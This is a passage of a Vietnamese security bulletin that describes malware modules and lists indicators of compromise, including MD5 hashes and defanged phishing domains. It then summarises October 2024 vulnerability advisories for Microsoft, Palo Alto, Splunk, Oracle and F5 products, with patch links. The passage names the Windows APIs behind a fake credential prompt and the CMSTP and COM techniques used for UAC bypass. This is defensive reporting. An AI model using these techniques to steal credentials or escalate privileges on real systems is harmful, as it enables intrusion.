Credential Phisher: module có nhiệm vụ thu thập thông tin đăng nhập Windows của người dùng bằng cách hiển thị các lời nhắc thông qua hàm CredUIPromptForWindowsCredentialsW nhằm đánh lừa nạn nhân. Mã độc cũng sử dụng LogonUserW để kiểm tra thông tin nhập từ người dùng. Dữ liệu đúng sẽ được ghi lại thông qua namepipe đã cấu hình sẵn trước đó “a21hg56ue2c2365cba1g9840256ad31c”
Bypass UAC: có nhiệm vụ bypass UAC và thực thi mã độc với đặc quyền cao hơn, với các kỹ thuật như lạm dụng CMSTP, lợi dụng COM object IElevatedFactoryServer
Indicator of Compromises (IoCs)
Malicious documents
6cf6d55a3968e2176db2bba2134bbe94
c87eb71ff038df7b517644fa5c097eac
8202209354ece5c53648c52bdbd064f0
5cc784afb69c153ab325266e8a7afaf4
3a6916192106ae3ac7e55bd357bc5eee
54aadadcf77dec53b2566fe61b034384
8f83d19c2efc062e8983bce83062c9b6
8e8b61e5fb6f6792f2bee0ec947f1989
86eeb037f5669bff655de1e08199a554
1c36177ac4423129e301c5a40247f180
873079cd3e635adb609c38af71bad702
423e150d91edc568546f0d2f064a8bf1
4a5e818178f9b2dc48839a5dbe0e3cc1
Rtf
26aa30505d8358ebeb5ee15aecb1cbb0
3233db78e37302b47436b550a21cdaf9
8d7c43913eba26f96cd656966c1e26d5
d0d1fba6bb7be933889ace0d6955a1d7
e706fc65f433e54538a3dbb1c359d75f
propsys.dll
b69867ee5b9581687cef96e873b775ff
c3ce4094b3411060928143f63701aa2e
e1bdfa55227d37a71cdc248dc9512296
ea4b3f023bac3ad1a982cace9a6eafc3
44dbdd87b60c20b22d2a7926ad2d7bea
7e97cbf25eef7fc79828c033049822af
vsstrace.dll
101a63ecdd8c68434c665bf2b1d3ffc7
d885df399fc9f6c80e2df0c290414c2f
92dd91a5e3dfb6260e13c8033b729e03
515d2d6f91ba4b76847301855dfc0e83
3ede84d84c02aa7483eb734776a20dea
2011658436a7b04935c06f59a5db7161
StealerBot
3a036a1846bfeceb615101b10c7c910e
47f51c7f31ab4a0d91a0f4c07b2f99d7
f3058ac120a2ae7807f36899e27784ea
0fbb71525d65f0196a9bfbffea285b18
1ed7ad166567c46f71dc703e55d31c7a
2f0e150e3d6dbb1624c727d1a641e754
bf16760ee49742225fdb2a73c1bd83c7
mscorlib.dll
b3650a88a50108873fc45ad3c249671a
4c40fcb2a12f171533fc070464db96d1
eef9c0a9e364b4516a83a92592ffc831
SyncBotServiceHijack.dll
1be93704870afd0b22a4475014f199c3
Service Hijack
f840c721e533c05d152d2bc7bf1bc165
Backdoor Loader devobj.dll
5718c0d69939284ce4f6e0ce580958df
Domains and IPs
126-com[.]live
163inc[.]com
afmat[.]tech
alit[.]live
aliyum[.]tech
aliyumm[.]tech
asyn[.]info
ausibedu[.]org
bol-south[.]org
cnsa-gov[.]org
colot[.]info
comptes[.]tech
condet[.]org
conft[.]live
dafpak[.]org
decoty[.]tech
defenec[.]net
defpak[.]org
detru[.]info
dgps-govpk[.]co
dgps-govpk[.]com
dinfed[.]co
dirctt88[.]co
dirctt88[.]net
direct888[.]net
direct88[.]co
directt888[.]com
donwload-file[.]com
donwloaded[.]com
donwloaded[.]net
dowmload[.]net
downld[.]net
download-file[.]net
downloadabledocx[.]com
dynat[.]tech
dytt88[.]org
e1ix[.]mov
e1x[.]tech
fia-gov[.]com
fia-gov[.]net
gov-govpk[.]info
govpk[.]info
govpk[.]net
grouit[.]tech
gtrec[.]info
healththebest[.]com
jmicc[.]xyz
kernet[.]info
kretic[.]info
lforvk[.]com
mfa-gov[.]info
mfa-gov[.]net
mfa-govt[.]net
mfacom[.]org
mfagov[.]org
mfas[.]pro
mitlec[.]site
mod-gov-pk[.]live
mofa[.]email
mofagovs[.]org
moittpk[.]net
moittpk[.]org
mshealthcheck[.]live
nactagovpk[.]org
navy-mil[.]co
newmofa[.]com
newoutlook[.]live
nopler[.]live
ntcpak[.]live
ntcpak[.]org
ntcpk[.]info
ntcpk[.]net
numpy[.]info
numzy[.]net
nventic[.]info
office-drive[.]live
pafgovt[.]com
paknavy-gov[.]org
paknavy-govpk[.]info
paknavy-govpk[.]net
pdfrdr-update[.]com
pdfrdr-update[.]info
pmd-office[.]com
pmd-office[.]live
pmd-office[.]org
ptcl-net[.]com
scrabt[.]tech
shipping-policy[.]info
sjfu-edu[.]co
support-update[.]info
tazze[.]co
tex-ideas[.]info
tni-mil[.]com
tsinghua-edu[.]tech
tumet[.]info
u1x[.]co
ujsen[.]net
update-govpk[.]co
updtesession[.]online
widge[.]info
3 CVE và các khuyến nghị bảo mật
3.1 Microsoft Patch Tuesday – October 2024
Trong tháng 10, Microsoft đã phát hành các bản vá cho 117 CVE mới trong các sản phẩm của Windows và Windows Components; Office và Office Components; Azure; .NET và Visual Studio; OpenSSH for Windows; Power BI; Windows Hyper-V; và Windows Mobile Broadband. Trong đó có 3 lỗ hổng được đánh giá mức độ Nghiêm trọng, 115 lỗ hổng được đánh giá là Important, 2 lỗ hổng được đánh giá Moderate. Dưới đây là các CVE nổi bật:
3.1.1 CVE-2024-43573– Windows MSHTML Platform Spoofing Vulnerability
CVSS: 6.5/10
Mô tả: Tồn tại lỗ hổng Spoofing trong Windows MSHTML Platform. Khai thác lỗ hổng yêu cầu kẻ tấn công cần chuẩn bị môi trường mục tiêu và có sự tương tác từ người dùng.
Phiên bản ảnh hưởng:
Windows 11 Version 23H2 for x64-based Systems
Windows 10 Version 21H2 for 32-bit Systems
Windows Server 2022, 23H2 Edition (Server Core installation)
Windows 10 Version 22H2 for 32-bit Systems
Windows Server 2022
Windows 10 Version 22H2 for ARM64-based Systems
Windows Server 2012 R2
Windows Server 2016 (Server Core installation)
Windows 10 Version 1607 for 32-bit Systems
Windows Server 2012 R2 (Server Core installation)
Windows 10 for x64-based Systems
Windows 10 Version 1607 for x64-based Systems
Windows Server 2016
Windows 10 for 32-bit Systems
Windows 11 Version 24H2 for ARM64-based Systems
Windows 11 Version 24H2 for x64-based Systems
Windows Server 2019 (Server Core installation)
Windows 10 Version 1809 for 32-bit Systems
Windows 10 Version 1809 for x64-based Systems
Windows Server 2019
Windows 10 Version 21H2 for ARM64-based Systems
Windows Server 2022 (Server Core installation)
Windows 10 Version 21H2 for x64-based Systems
Windows 11 version 21H2 for x64-based Systems
Windows 11 Version 23H2 for ARM64-based Systems
Windows 11 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for ARM64-based Systems
Windows 11 version 21H2 for ARM64-based Systems
Windows 10 Version 22H2 for x64-based Systems
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-43573
3.1.2 CVE-2024-43572 – Microsoft Management Console Remote Code Execution Vulnerability
CVSS: 7.8/10
Mô tả: Tồn tại lỗ hổng thực thi mã từ xa trên Microsoft Management Console. Khai thác lỗ hổng yêu cầu tương tác từ người dùng thông qua kỹ nghệ xã hội.
Phiên bản ảnh hưởng:
Windows Server 2012 R2 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2012
Windows Server 2008 R2 for x64based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 R2 for x64based Systems Service Pack 1
Windows Server 2008 for x64based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64based Systems Service Pack 2
Windows Server 2008 for 32bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for 32bit Systems Service Pack 2
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows 10 Version 1607 for x64based Systems
Windows 10 Version 1607 for 32bit Systems
Windows 10 for x64based Systems
Windows 10 for 32bit Systems
Windows 11 Version 24H2 for x64based Systems
Windows 11 Version 24H2 for ARM64based Systems
Windows Server 2022, 23H2 Edition (Server Core installation)
Windows 11 Version 23H2 for x64based Systems
Windows 11 Version 23H2 for ARM64based Systems
Windows 10 Version 22H2 for 32bit Systems
Windows 10 Version 22H2 for ARM64based Systems
Windows 10 Version 22H2 for x64based Systems
Windows 11 Version 22H2 for x64based Systems
Windows 11 Version 22H2 for ARM64based Systems
Windows 10 Version 21H2 for x64based Systems
Windows 10 Version 21H2 for ARM64based Systems
Windows 10 Version 21H2 for 32bit Systems
Windows 11 version 21H2 for ARM64based Systems
Windows 11 version 21H2 for x64based Systems
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows 10 Version 1809 for x64based Systems
Windows 10 Version 1809 for 32bit Systems
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-43572
3.1.3 CVE-2024-43468 – Microsoft Configuration Manager Remote Code Execution Vulnerability
CVSS: 9.8/10
Mô tả: Tồn tại lỗ hổng cho phép kẻ tấn công không cần xác thực thực thi mã từ xa trên hệ thống ảnh hưởng. Khai thác lỗ hổng yêu cầu kẻ tấn công gửi các request độc hại đến môi trường mục tiêu.
Phiên bản ảnh hưởng:
Microsoft Configuration Manager 2403
Microsoft Configuration Manager 2309
Microsoft Configuration Manager 2303
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-43468
3.1.4 CVE-2024-43582 – Remote Desktop Protocol Server Remote Code Execution Vulnerability
CVSS: 8.1/10
Mô tả: Tồn tại lỗ hổng race-condition cho phép kẻ tấn công không cần xác thực thực thi mã từ xa trên hệ thống bị ảnh hưởng. Khai thác lỗ hổng yêu cầu kẻ tấn công gửi các packet độc hại đến RPC host.
Phiên bản ảnh hưởng:
Windows 11 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for ARM64-based Systems
Windows 10 Version 21H2 for x64-based Systems
Windows 10 Version 21H2 for ARM64-based Systems
Windows 10 Version 21H2 for 32-bit Systems
Windows 11 Version 24H2 for x64-based Systems
Windows 11 Version 24H2 for ARM64-based Systems
Windows Server 2022, 23H2 Edition (Server Core installation)
Windows 11 Version 23H2 for x64-based Systems
Windows 11 Version 23H2 for ARM64-based Systems
Windows 10 Version 22H2 for 32-bit Systems
Windows 10 Version 22H2 for ARM64-based Systems
Windows 10 Version 22H2 for x64-based Systems
Windows 11 version 21H2 for ARM64-based Systems
Windows 11 version 21H2 for x64-based Systems
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-43582
3.1.5 CVE-2024-43503 – Microsoft SharePoint Elevation of Privilege Vulnerability
CVSS: 7.8/10
Mô tả: Tồn tại lỗ hổng leo thang đặc quyền trên Microsoft SharePoint cho phép kẻ tấn công leo thang lên đặc quyền SYSTEM trên hệ thống bị ảnh hưởng.
Phiên bản ảnh hưởng:
Microsoft SharePoint Server Subscription Edition
Microsoft SharePoint Server 2019
Microsoft SharePoint Enterprise Server 2016
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-43503
3.2 Ứng Dụng Web Và Các Sản Phẩm Khác
3.2.1 CVE-2024-9473 GlobalProtect App: Local Privilege Escalation (PE) Vulnerability
CVSS: 5.2/10
Mô tả: Tồn tại lỗ hổng leo thang đặc quyền trong Palo Alto Networks GlobalProtect Windows cho phép kẻ tấn công leo thang lên đặc quyền NT AUTHORITY/SYSTEM.
Phiên bản ảnh hưởng:
Phiên bản GlobalProtect App 5.1, 6.0, 6.1, 6.3
Phiên bản GlobalProtect App 6.2 < 6.2.5
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://security.paloaltonetworks.com/CVE-2024-9473
3.2.2 CVE-2024-9471 PAN-OS: Privilege Escalation (PE) Vulnerability in XML API
CVSS: 5.1/10
Mô tả: Tồn tại lỗ hổng leo thang đặc quyền trên PAN-OS XML API cho phép kẻ tấn công leo thang lên PAN-OS administrator với các quyền nâng cao thông qua XML API key. Khai thác lỗ hổng yêu cầu kẻ tấn công có quyền truy cập vào API XML PAN-OS.
Phiên bản ảnh hưởng:
PAN-OS 11.0
PAN-OS 10.2
PAN-OS 10.1
PAN-OS 9.1
PAN-OS 9.0
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://security.paloaltonetworks.com/CVE-2024-9471
3.2.3 CVE-2024-9468 PAN-OS: Firewall Denial of Service (DoS) via a Maliciously Crafted Packet
CVSS: 8.2/10
Mô tả: Tồn tại lỗ hổng memory corruption trong Palo Alto Networks PAN-OS cho phép kẻ tấn công không cần xác thực thực hiện tấn công DoS (Denial of Service) bằng cách gửi các packet độc hại thông qua data plane.
Phiên bản ảnh hưởng:
Phiên bản PAN-OS 11.1 < 11.1.3
Phiên bản PAN-OS 11.0 < 11.0.4-h5, < 11.0.6
Phiên bản PAN-OS 10.2 < 10.2.9-h11, < 10.2.10-h4, < 10.2.11
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://security.paloaltonetworks.com/CVE-2024-9468
3.2.4 CVE-2024-45733 – Remote Code Execution (RCE) due to insecure session storage configuration in Splunk Enterprise on Windows
CVSS: 8.8/10
Mô tả: Tồn tại lỗ hổng trên Splunk Enterprise on Windows cho phép kẻ tấn công thực thi mã từ xa trên hệ thống bị ảnh hưởng.
Phiên bản ảnh hưởng:
Splunk Enterprise 9.1 phiên bản 9.1.0 đến 9.1.5
Splunk Enterprise 9.2 phiên bản 9.2.0 đến 9.2.2
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://advisory.splunk.com/advisories/SVD-2024-1003
https://docs.splunk.com/Documentation/Splunk/latest/Security/DisableunnecessarySplunkcomponents
3.2.5 CVE-2024-21216 Critical vulnerability in Oracle WebLogic
CVSS: 9.8/10
Mô tả: Tồn tại lỗ hổng cho phép kẻ tấn công không xác thực chiếm được quyền kiểm soát máy chủ sử dụng Oracle WebLogic Server. Quá trình khai thác lỗ hổng thông qua 2 giao thức T3 và IIOP, lỗ hổng ảnh hưởng đến 2 phiên bản 12.2.1.4.0 và 14.1.1.0.0.
Phiên bản ảnh hưởng:
Phiên bản 12.2.1.4.0 và 14.1.1.0.0
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://www.oracle.com/security-alerts/cpuoct2024.html
3.2.6 CVE-2024-45844- Privilege Escalation Vulnerability in BIG-IP
CVSS: 8.6/10
Mô tả: Tồn tại lỗ hổng cho phép kẻ tấn công có quyền truy cập vào Configuration utility và TMOS Shell (tmsh) nhằm leo thang đặc quyền và xâm phạm vào hệ thống BIG-IP. Khai thác lỗ hổng yêu cầu xác thực.
Phiên bản ảnh hưởng:
BIG-IP 17.x phiên bản 17.1.0 – 17.1.1
BIG-IP 16.x phiên bản 16.1.0 – 16.1.4
BIG-IP 15.x phiên bản 15.1.0 – 15.1.10
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng: